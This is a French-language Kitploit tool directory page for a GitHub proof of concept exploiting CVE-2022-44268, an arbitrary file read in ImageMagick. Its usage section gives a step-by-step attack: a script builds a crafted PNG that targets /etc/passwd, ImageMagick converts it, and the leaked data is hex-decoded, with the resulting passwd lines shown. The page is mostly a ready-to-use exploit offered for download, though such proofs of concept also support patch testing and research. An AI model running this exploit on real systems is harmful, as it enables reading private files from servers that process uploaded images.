Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
imagemagick-lfi-poc — ImageMagick PoC LFI [CVE-2022-44268] | Kitploit
Outils/GitHubGitHub/sybil-scan/imagemagick-lfi-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubsybil-scan/imagemagick-lfi-poc

imagemagick-lfi-poc

ImageMagick PoC LFI [CVE-2022-44268]

Voir le dépôt
5391il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ImageMagick LFI PoC [CVE-2022-44268]

Les chercheurs de MetabaseQ ont découvert la CVE-2022-44268, c'est-à-dire qu'ImageMagick 7.1.0-49 est vulnérable à une divulgation d'informations. Lorsqu'il analyse une image PNG (par exemple, pour un redimensionnement), l'image résultante peut contenir le contenu d'un fichier distant arbitraire (si le binaire ImageMagick dispose des autorisations nécessaires pour le lire).

Utilisation

  • Assurez-vous d'avoir ImageMagick et les paquets Python requis installés.
(~)>>> python3 generate.py -f "/etc/passwd" -o exploit.png

   [>] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>
   [>] Generating Blank PNG
   [>] Blank PNG generated
   [>] Placing Payload to read /etc/passwd
   [>] PoC PNG generated > exploit.png
  • Convertissez le fichier PNG généré :
(~)>>> convert exploit.png result.png
  • Lisez le contenu du fichier PNG converti :
(~)>>> identify -verbose result.png
  • Décodez les données renvoyées dans le champ Raw profile type, vous observerez le contenu de /etc/passwd :
(~)>>> python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

Références

  • https://www.metabaseq.com/imagemagick-zero-days/
  • https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
Télécharger l’outil